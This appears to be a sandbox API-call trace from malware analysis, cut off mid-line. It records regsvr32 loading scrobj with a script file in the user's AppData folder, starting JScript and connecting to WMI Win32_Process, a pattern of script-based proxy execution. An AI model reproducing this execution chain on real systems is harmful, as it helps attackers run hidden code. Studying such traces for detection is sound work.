[0172.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 53 [0172.027] wcscpy_s (in: _Destination=0x25ee10, _SizeInWords=0x105, _Source="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" | out: _Destination="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 0x0 [0172.027] lstrlenW (lpString="scrobj") returned 6 [0172.027] OleInitialize (pvReserved=0x0) returned 0x0 [0172.041] SetErrorMode (uMode=0x1) returned 0x8001 [0172.042] _wsplitpath_s (in: _FullPath="scrobj", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0x25df50, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext="") returned 0x0 [0172.042] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="", ulOptions=0x0, samDesired=0x1, phkResult=0x25df38 | out: phkResult=0x25df38*=0xffffffff80000000) returned 0x0 [0172.042] RegQueryValueW (in: hKey=0xffffffff80000000, lpSubKey=0x0, lpData=0x25e150, lpcbData=0x25df30 | out: lpData="", lpcbData=0x25df30) returned 0x0 [0172.042] RegCloseKey (hKey=0xffffffff80000000) returned 0x0 [0172.043] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="", ulOptions=0x0, samDesired=0x1, phkResult=0x25df38 | out: phkResult=0x25df38*=0xffffffff80000000) returned 0x0 [0172.043] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0x25df40 | out: phkResult=0x25df40*=0x0) returned 0x2 [0172.043] RegCloseKey (hKey=0xffffffff80000000) returned 0x0 [0172.043] SetErrorMode (uMode=0x1) returned 0x1 [0172.043] LoadLibraryExW (lpLibFileName="scrobj", hFile=0x0, dwFlags=0x8) returned 0x7fef85f0000 [0172.048] SetErrorMode (uMode=0x1) returned 0x1 [0172.048] GetProcAddress (hModule=0x7fef85f0000, lpProcName="DllInstall") returned 0x7fef85fe7a8 [0172.048] DllInstall (bInstall=0, pszCmdLine="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 0x80020006 [0172.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25c380 | out: lpSystemTimeAsFileTime=0x25c380*(dwLowDateTime=0xe9d41ab0, dwHighDateTime=0x1d59514)) [0172.699] GetCurrentProcessId () returned 0x968 [0172.699] GetCurrentThreadId () returned 0x964 [0172.699] GetTickCount () returned 0x1163b2d [0172.699] QueryPerformanceCounter (in: lpPerformanceCount=0x25c388 | out: lpPerformanceCount=0x25c388*=29292159682) returned 1 [0172.699] malloc (_Size=0x100) returned 0x1866d0 [0172.700] __dllonexit () returned 0x7fef82e0728 [0172.700] __dllonexit () returned 0x7fef82e0780 [0172.700] __dllonexit () returned 0x7fef82e0750 [0172.700] __dllonexit () returned 0x7fef82e07b0 [0172.997] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdbf0000 [0172.997] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegisterTraceGuidsA") returned 0x76f6f570 [0172.997] EtwRegisterTraceGuidsA () returned 0x0 [0172.998] EtwRegisterTraceGuidsA () returned 0x0 [0172.998] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25bf70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\regsvr32.EXE" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20 [0172.999] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegOpenKeyExA") returned 0x7fefdc0b5f0 [0172.999] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x25c0d8 | out: phkResult=0x25c0d8*=0x0) returned 0x2 [0173.004] GetVersion () returned 0x1db10106 [0173.004] ??2@YAPEAX_K@Z () returned 0x1867e0 [0173.005] ??2@YAPEAX_K@Z () returned 0x188990 [0173.005] GetUserDefaultLCID () returned 0x409 [0173.005] GetACP () returned 0x4e4 [0173.005] ??3@YAXPEAX@Z () returned 0x66333801 [0173.005] GetCurrentThreadId () returned 0x964 [0173.006] ??2@YAPEAX_K@Z () returned 0x188d80 [0173.006] GetCurrentThreadId () returned 0x964 [0173.006] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e008 | out: phkResult=0x25e008*=0xd4) returned 0x0 [0173.006] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegQueryValueExA") returned 0x7fefdc0c480 [0173.006] RegQueryValueExA (in: hKey=0xd4, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x25e000, lpData=0x25dff8, lpcbData=0x25dff0*=0x4 | out: lpType=0x25e000*=0x4, lpData=0x25dff8*=0x1, lpcbData=0x25dff0*=0x4) returned 0x0 [0173.006] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegCloseKey") returned 0x7fefdc10710 [0173.006] RegCloseKey (hKey=0xd4) returned 0x0 [0173.006] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe2b0000 [0173.006] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoGetObjectContext") returned 0x7fefe2cc920 [0173.006] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe2b0000 [0173.007] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoCreateInstance") returned 0x7fefe2d7490 [0173.007] CoCreateInstance (in: rclsid=0x7fef834cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef834cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25dfd0 | out: ppv=0x25dfd0*=0x7fefe48a1b0) returned 0x0 [0173.010] ??2@YAPEAX_K@Z () returned 0x188dd0 [0173.010] ??2@YAPEAX_KHPEBDH@Z () returned 0x188e90 [0173.010] ??2@YAPEAX_K@Z () returned 0x188eb0 [0173.010] ??2@YAPEAX_K@Z () returned 0x187f80 [0173.010] ??2@YAPEAX_K@Z () returned 0x188f10 [0173.010] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x25df90, nSize=0x27 | out: lpBuffer="") returned 0x0 [0173.010] GetSystemDefaultLCID () returned 0x409 [0173.010] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x25e030, cchData=6 | out: lpLCData="1252") returned 5 [0173.010] IsValidCodePage (CodePage=0x4e4) returned 1 [0173.011] CoCreateInstance (in: rclsid=0x7fef8345d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef8345d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x188d00 | out: ppv=0x188d00*=0x38f970) returned 0x0 [0173.011] IUnknown:AddRef (This=0x38f970) returned 0x2 [0173.011] GetCurrentProcessId () returned 0x968 [0173.011] GetCurrentThreadId () returned 0x964 [0173.011] GetTickCount () returned 0x1163c65 [0173.011] ISystemDebugEventFire:BeginSession (This=0x38f970, guidSourceID=0x7fef8345da8, strSessionName="JScript:00002408:00002404:18234469") returned 0x0 [0173.011] GetCurrentThreadId () returned 0x964 [0173.011] GetCurrentThreadId () returned 0x964 [0173.012] realloc (_Block=0x0, _Size=0xc8) returned 0x1884c0 [0173.012] ??2@YAPEAX_K@Z () returned 0x188590 [0173.012] malloc (_Size=0x1008) returned 0x188fb0 [0173.012] ??2@YAPEAX_K@Z () returned 0x189fc0 [0173.012] malloc (_Size=0x108) returned 0x18a170 [0173.013] malloc (_Size=0x208) returned 0x18a280 [0173.013] ??3@YAXPEAX@Z () returned 0x66333801 [0173.013] malloc (_Size=0x40) returned 0x1885d0 [0173.013] malloc (_Size=0x2c0) returned 0x18a490 [0173.013] ??2@YAPEAX_K@Z () returned 0x188620 [0173.013] free (_Block=0x188fb0) [0173.013] ??3@YAXPEAX@Z () returned 0x66333801 [0173.013] free (_Block=0x1885d0) [0173.013] free (_Block=0x18a280) [0173.014] free (_Block=0x18a170) [0173.014] ??2@YAPEAX_K@Z () returned 0x188590 [0173.014] ??2@YAPEAX_K@Z () returned 0x1885f0 [0173.014] malloc (_Size=0x10) returned 0x188640 [0173.014] ??2@YAPEAX_K@Z () returned 0x18a760 [0173.014] CoGetObjectContext (in: riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ddc8 | out: ppv=0x25ddc8*=0x380060) returned 0x0 [0173.047] ??2@YAPEAX_K@Z () returned 0x189690 [0173.048] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefe48a1b0, pUnk=0x189690, riid=0x7fef8346340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0x1896c8 | out: pdwCookie=0x1896c8*=0x100) returned 0x0 [0173.048] IUnknown:AddRef (This=0x380060) returned 0x2 [0173.048] IUnknown:Release (This=0x380060) returned 0x1 [0173.049] ??2@YAPEAX_K@Z () returned 0x1896e0 [0173.049] GetTickCount () returned 0x1163c94 [0173.049] ??2@YAPEAX_K@Z () returned 0x18a060 [0173.049] CoGetObjectContext (in: riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25de18 | out: ppv=0x25de18*=0x380060) returned 0x0 [0173.049] IUnknown:Release (This=0x380060) returned 0x1 [0173.049] ??2@YAPEAX_K@Z () returned 0x18a120 [0173.049] ISystemDebugEventFire:IsActive (This=0x38f970) returned 0x1 [0173.049] CoGetObjectContext (in: riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ddb8 | out: ppv=0x25ddb8*=0x380060) returned 0x0 [0173.049] IUnknown:Release (This=0x380060) returned 0x1 [0173.051] malloc (_Size=0x988) returned 0x18c7e0 [0173.051] GetCurrentThreadId () returned 0x964 [0173.051] ??2@YAPEAX_K@Z () returned 0x18a200 [0173.052] ??2@YAPEAX_K@Z () returned 0x18a2b0 [0173.052] malloc (_Size=0x80) returned 0x18a360 [0173.052] malloc (_Size=0x108) returned 0x18a920 [0173.052] SysStringLen (param_1=0x0) returned 0x0 [0173.052] SysStringLen (param_1="winmgmts:Win32_Process") returned 0x16 [0173.052] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CreateBindCtx") returned 0x7fefe2d6730 [0173.052] CreateBindCtx (in: reserved=0x0, ppbc=0x25be50 | out: ppbc=0x25be50*=0x3a2400) returned 0x0 [0173.053] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="MkParseDisplayName") returned 0x7fefe2b9c5c [0173.053] MkParseDisplayName (in: pbc=0x3a2400, szUserName="winmgmts:Win32_Process", pchEaten=0x25be40, ppmk=0x25be48 | out: pchEaten=0x25be40, ppmk=0x25be48*=0x3bbdd0) returned 0x0 [0173.065] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25a030 | out: lpSystemTimeAsFileTime=0x25a030*(dwLowDateTime=0xea0d3bb0, dwHighDateTime=0x1d59514)) [0173.065] GetCurrentProcessId () returned 0x968 [0173.065] GetCurrentThreadId () returned 0x964 [0173.066] GetTickCount () returned 0x1163ca3 [0173.066] QueryPerformanceCounter (in: lpPerformanceCount=0x25a038 | out: lpPerformanceCount=0x25a038*=29328812075) returned 1 [0173.066] malloc (_Size=0x100) returned 0x18ac50 [0173.066] DllGetClassObject (in: rclsid=0x398830*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x25b7f0*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25aaf0 | out: ppv=0x25aaf0*=0x0) returned 0x80004002 [0173.066] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651370 [0173.066] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.066] DllGetClassObject (in: rclsid=0x398830*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x7fefe436cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ba48 | out: ppv=0x25ba48*=0x2651370) returned 0x0 [0173.066] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651370 [0173.067] WinMGMTS:IClassFactory:CreateInstance (in: This=0x2651370, pUnkOuter=0x0, riid=0x7fefe43d650*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25ba98 | out: ppvObject=0x25ba98*=0x26513d0) returned 0x0 [0173.067] GetVersionExW (in: lpVersionInformation=0x25b7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x20, dwBuildNumber=0x0, dwPlatformId=0x2650298, szCSDVersion="") | out: lpVersionInformation=0x25b7c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0173.067] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x25b7b0 | out: phkResult=0x25b7b0*=0x140) returned 0x0 [0173.067] RegQueryValueExW (in: hKey=0x140, lpValueName="Default Impersonation Level", lpReserved=0x0, lpType=0x0, lpData=0x25b7a4, lpcbData=0x25b7a0*=0x4 | out: lpType=0x0, lpData=0x25b7a4*=0x3, lpcbData=0x25b7a0*=0x4) returned 0x0 [0173.067] RegCloseKey (hKey=0x140) returned 0x0 [0173.067] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651390 [0173.067] GetSystemDirectoryW (in: lpBuffer=0x2651390, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0173.067] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdbf0000 [0173.067] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="DuplicateTokenEx") returned 0x7fefdbfd310 [0173.067] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.067] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651390 [0173.067] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26513d0 [0173.068] WinMGMTS:IUnknown:Release (This=0x2651370) returned 0x0 [0173.068] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.068] WinMGMTS:IParseDisplayName:ParseDisplayName (in: This=0x26513d0, pbc=0x3a2400, pszDisplayName="winmgmts:Win32_Process", pchEaten=0x25be28, ppmkOut=0x25bdd0 | out: pchEaten=0x25be28*=0x16, ppmkOut=0x25bdd0*=0x3bbdd0) returned 0x0 [0173.068] _wcsnicmp (_String1="winmgmts:", _String2="WINMGMTS:", _MaxCount=0x9) returned 0 [0173.068] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26513f0 [0173.068] _wcsnicmp (_String1="W", _String2="{", _MaxCount=0x1) returned -4 [0173.068] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651430 [0173.068] CoCreateInstance (in: rclsid=0x7fef8251738*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef82516c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x2651460 | out: ppv=0x2651460*=0x26514e0) returned 0x0 [0173.073] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651500 [0173.073] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651590 [0173.073] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651630 [0173.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0173.074] GetCurrentThreadId () returned 0x964 [0173.074] _wcsnicmp (_String1="W", _String2="[", _MaxCount=0x1) returned 28 [0173.074] _wcsnicmp (_String1="W", _String2="!", _MaxCount=0x1) returned 86 [0173.074] CoCreateInstance (in: rclsid=0x7fef8251698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef8251688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x25bc18 | out: ppv=0x25bc18*=0x2651670) returned 0x0 [0173.104] CoCreateInstance (in: rclsid=0x7fef8251698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef8251688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x25bb38 | out: ppv=0x25bb38*=0x2651770) returned 0x0 [0173.104] WbemDefPath:IWbemPath:SetText (This=0x2651770, uMode=0x4, pszPath="Win32_Process") returned 0x0 [0173.104] WbemDefPath:IUnknown:Release (This=0x2651770) returned 0x0 [0173.104] SysStringLen (param_1="Win32_Process") returned 0xd [0173.104] WbemDefPath:IWbemPath:SetText (This=0x2651670, uMode=0x4, pszPath="Win32_Process") returned 0x0 [0173.104] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2651670, puCount=0x25bb78 | out: puCount=0x25bb78*=0x0) returned 0x0 [0173.104] WbemDefPath:IWbemPath:GetServer (in: This=0x2651670, puNameBufLength=0x25bb60*=0x0, pName=0x0 | out: puNameBufLength=0x25bb60*=0x2, pName=0x0) returned 0x0 [0173.104] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26517a0 [0173.104] WbemDefPath:IWbemPath:GetServer (in: This=0x2651670, puNameBufLength=0x25bb60*=0x2, pName="ᢐɥ" | out: puNameBufLength=0x25bb60*=0x2, pName=".") returned 0x0 [0173.104] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.105] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0173.105] GetCurrentThreadId () returned 0x964 [0173.105] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x25ba48 | out: phkResult=0x25ba48*=0x148) returned 0x0 [0173.105] RegQueryValueExW (in: hKey=0x148, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x25ba40*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x25ba40*=0x16) returned 0x0 [0173.105] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26517a0 [0173.105] RegQueryValueExW (in: hKey=0x148, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x26517a0, lpcbData=0x25ba40*=0x16 | out: lpType=0x0, lpData=0x26517a0*=0x72, lpcbData=0x25ba40*=0x16) returned 0x0 [0173.105] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26517c0 [0173.105] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.105] RegCloseKey (hKey=0x148) returned 0x0 [0173.105] CoCreateInstance (in: rclsid=0x7fef8251698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef8251688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x25ba80 | out: ppv=0x25ba80*=0x2651890) returned 0x0 [0173.105] SysStringLen (param_1=".") returned 0x1 [0173.105] WbemDefPath:IWbemPath:SetServer (This=0x2651890, Name=".") returned 0x0 [0173.105] CoCreateInstance (in: rclsid=0x7fef8251698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef8251688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x25ba00 | out: ppv=0x25ba00*=0x2651990) returned 0x0 [0173.105] CoCreateInstance (in: rclsid=0x7fef8251698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef8251688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x25b9e8 | out: ppv=0x25b9e8*=0x2651a90) returned 0x0 [0173.105] WbemDefPath:IWbemPath:SetText (This=0x2651a90, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0173.105] WbemDefPath:IUnknown:Release (This=0x2651a90) returned 0x0 [0173.105] SysStringLen (param_1="root\\cimv2") returned 0xa [0173.106] WbemDefPath:IWbemPath:SetText (This=0x2651990, uMode=0xc, pszPath="root\\cimv2") returned 0x0 [0173.106] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x2651990, puCount=0x25ba40 | out: puCount=0x25ba40*=0x2) returned 0x0 [0173.106] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x2651890) returned 0x0 [0173.106] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2651990, uIndex=0x0, puNameBufLength=0x25b9d0*=0x0, pName=0x0 | out: puNameBufLength=0x25b9d0*=0x5, pName=0x0) returned 0x0 [0173.106] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651a90 [0173.106] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2651990, uIndex=0x0, puNameBufLength=0x25b9d0*=0x5, pName="ᲀɥ" | out: puNameBufLength=0x25b9d0*=0x5, pName="root") returned 0x0 [0173.106] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.106] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x2651890, uIndex=0x0, pszName="root") returned 0x0 [0173.106] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2651990, uIndex=0x1, puNameBufLength=0x25b9d0*=0x0, pName=0x0 | out: puNameBufLength=0x25b9d0*=0x6, pName=0x0) returned 0x0 [0173.106] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651d30 [0173.106] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x2651990, uIndex=0x1, puNameBufLength=0x25b9d0*=0x6, pName="Řɥ" | out: puNameBufLength=0x25b9d0*=0x6, pName="cimv2") returned 0x0 [0173.107] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.107] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x2651890, uIndex=0x1, pszName="cimv2") returned 0x0 [0173.107] WbemDefPath:IUnknown:Release (This=0x2651990) returned 0x0 [0173.107] WbemDefPath:IWbemPath:GetText (in: This=0x2651890, lFlags=4, puBuffLength=0x25ba40*=0x0, pszText=0x0 | out: puBuffLength=0x25ba40*=0xf, pszText=0x0) returned 0x0 [0173.107] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651990 [0173.107] WbemDefPath:IWbemPath:GetText (in: This=0x2651890, lFlags=4, puBuffLength=0x25ba40*=0xf, pszText="ᫀɥ" | out: puBuffLength=0x25ba40*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.107] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0173.107] WbemDefPath:IUnknown:Release (This=0x2651890) returned 0x0 [0173.107] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26514e0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x25bb10 | out: ppNamespace=0x25bb10*=0x2663738) returned 0x0 [0174.017] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2663750 [0174.017] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2663800 [0174.017] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26638a0 [0174.018] WbemLocator:IUnknown:QueryInterface (in: This=0x2663738, riid=0x7fef8251628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b8d8 | out: ppvObject=0x25b8d8*=0x3b8440) returned 0x0 [0174.018] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3b8440, pProxy=0x2663738, pAuthnSvc=0x25b8d0, pAuthzSvc=0x25b918, pServerPrincName=0x0, pAuthnLevel=0x25b968, pImpLevel=0x25b920, pAuthInfo=0x0, pCapabilites=0x25b908 | out: pAuthnSvc=0x25b8d0*=0xa, pAuthzSvc=0x25b918*=0x0, pServerPrincName=0x0, pAuthnLevel=0x25b968*=0x6, pImpLevel=0x25b920*=0x2, pAuthInfo=0x0, pCapabilites=0x25b908*=0x1) returned 0x0 [0174.018] WbemLocator:IUnknown:Release (This=0x3b8440) returned 0x1 [0174.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.018] GetCurrentThreadId () returned 0x964 [0174.018] WbemLocator:IUnknown:QueryInterface (in: This=0x2663738, riid=0x7fef8251628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b930 | out: ppvObject=0x25b930*=0x3b8440) returned 0x0 [0174.018] WbemLocator:IClientSecurity:CopyProxy (in: This=0x3b8440, pProxy=0x2663738, ppCopy=0x25b928 | out: ppCopy=0x25b928*=0x2663ad8) returned 0x0 [0174.018] WbemLocator:IUnknown:QueryInterface (in: This=0x2663ad8, riid=0x7fef8251628*(Data1=0x13d, Data2=0x0, 